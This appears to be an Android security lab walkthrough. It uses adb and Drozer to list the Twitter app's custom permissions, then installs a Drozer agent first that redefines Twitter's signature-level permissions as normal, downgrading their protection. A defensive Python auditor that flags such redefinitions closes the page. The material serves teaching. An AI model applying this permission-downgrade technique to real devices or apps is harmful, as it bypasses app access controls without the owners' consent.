ip addr
Find your IP address, as highlighted in the image below.
To find your Android device, execute this command, replacing the IP address with the IP address you found above, including the CIDR suffix "/24".
netdiscover -r 172.16.123.155/24
Netdiscover finds the devices on your network. Find the one that is not from "VMware", as highlighted in the image below.
Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined in the previous step.
adb connect 172.16.123.171
Adb connects, as shown below.
If you don't have a Drozer agent on your emulator, execute these commands to install one:
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk
adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.
drozer console connect
run app.package.info -a com.twitter.android
Information about the app appears, starting with general information as shown below.
At the end, there are three permissions the Twitter app defines, as shown below:
I was unable to find out what "READ_DATA" does in detail, but we can learn more about the other two permissions.
To see the app's components, execute this command:
run app.package.attacksurface com.twitter.android
Twitter uses several activities, "broadcast receivers", and services, but no "content providers", as shown below.
run app.activity.info -a com.twitter.android
We see that the AUTH_APP permission controls access to the AuthorizeAppActivity activity, as shown below.
run app.broadcast.info -a com.twitter.android
We see that the RESTRICTED permission controls access to the AppBroadcastReceiver receiver, as shown below.
run information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP
exit
As shown below, READ_DATA and RESTRICTED have the signature protection level, and AUTH_APP is marked as dangerous.
The signature-level permissions are only available to apps signed with the same certificate, and the dangerous permission will pop up a box requesting permission from the user.
Execute these commands to do that.
apt update
apt install openjdk-8-jdk -y
If an "Outdated processor microcode" box appears, press Enter.
Execute this command to reboot Kali.
reboot
Execute this command to select the default version of javac, the Java compiler:
update-alternatives --config javac
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.
Execute this command to select the default version of java:
update-alternatives --config java
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.
drozer agent build --permission \
com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.
adb connect 172.16.123.171
Adb connects, as shown below.
adb logcat -c
adb logcat | grep perm
Leave this window running, as shown below.
In the second command, adjust the path to lead to the APK file you built previously with Drozer.
adb uninstall com.mwr.dz
adb install /tmp/tmpzXbifs/agent.apk
The agent installs, as shown in the upper window in the image below.
The log shows that the app was not granted these two permissions:
This makes sense, because those are signature-level permissions, and the Drozer agent is not signed with the Twitter certificate.
adb uninstall com.mwr.dz
adb uninstall com.twitter.android
The operations succeed, as shown below.
drozer agent build --define-permission \
com.twitter.android.permission.READ_DATA normal \
com.twitter.android.permission.RESTRICTED normal \
com.twitter.android.permission.AUTH_APP normal --permission \
com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.
In the second command, adjust the path to lead to the APK file you built previously with Drozer.
adb install /tmp/tmp_URMcR/agent.apk
The agent installs, as shown below.
If you are using Android 5.0 or above, the installation should fail with the error message shown below.
I used the one shown below.
You can't use the Gapps button to install Google Play. Instead, you need to install these two components one by one, rebooting after each installation.
https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip
https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip
Then repeat the project. This time Twitter will install.
Launch the Drozer agent, configure port forwarding, and execute these commands to see Twitter's protection levels:
drozer console connect
run information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP
exit
The permissions are all normal, as shown below.
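The procedure above ends with Twitter's three permissions reporting as normal once a package that defines the same permission names is on the device. The following added example (not part of the original lab) audits two decoded AndroidManifest.xml files for such name collisions and marks the ones where the second definition is weaker. Both manifests are constructed samples that use the package names and protection levels shown on this page, and the symbolic protectionLevel values assume apktool-style decoded output.

```python
# Added example: flag custom permissions that a second package redefines.
# Both manifests are constructed samples in apktool-style decoded form.
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
NS = 'xmlns:android="http://schemas.android.com/apk/res/android"'
P = "com.twitter.android.permission."
# Strength order of base protection levels; an omitted attribute means "normal".
RANK = {"normal": 0, "dangerous": 1, "signature": 2, "signatureOrSystem": 2}

TARGET = f"""<manifest {NS} package="com.twitter.android">
  <permission android:name="{P}READ_DATA" android:protectionLevel="signature"/>
  <permission android:name="{P}RESTRICTED" android:protectionLevel="signature"/>
  <permission android:name="{P}AUTH_APP" android:protectionLevel="dangerous"/>
</manifest>"""

AGENT = f"""<manifest {NS} package="com.mwr.dz">
  <permission android:name="{P}READ_DATA" android:protectionLevel="normal"/>
  <permission android:name="{P}RESTRICTED"/>
  <permission android:name="{P}AUTH_APP" android:protectionLevel="normal"/>
  <uses-permission android:name="{P}READ_DATA"/>
</manifest>"""

def declared_permissions(manifest_xml):
    """Return (package, {permission name: base protection level})."""
    root = ET.fromstring(manifest_xml)
    perms = {}
    for node in root.iter("permission"):  # <uses-permission> is a different tag
        level = node.get(ANDROID + "protectionLevel", "normal")
        perms[node.get(ANDROID + "name")] = level.split("|")[0]  # drop flags
    return root.get("package"), perms

def find_redefinitions(target_xml, other_xml):
    """List permissions the target defines that another package also defines."""
    _, t_perms = declared_permissions(target_xml)
    o_pkg, o_perms = declared_permissions(other_xml)
    findings = []
    for name in sorted(t_perms.keys() & o_perms.keys()):
        weaker = RANK.get(o_perms[name], 0) < RANK.get(t_perms[name], 0)
        findings.append((name, t_perms[name], o_perms[name], o_pkg, weaker))
    return findings

if __name__ == "__main__":
    for name, want, got, pkg, weaker in find_redefinitions(TARGET, AGENT):
        flag = "WEAKER" if weaker else "same-or-stronger"
        print(f"{name}: {want} -> {got} (redefined by {pkg}) [{flag}]")
```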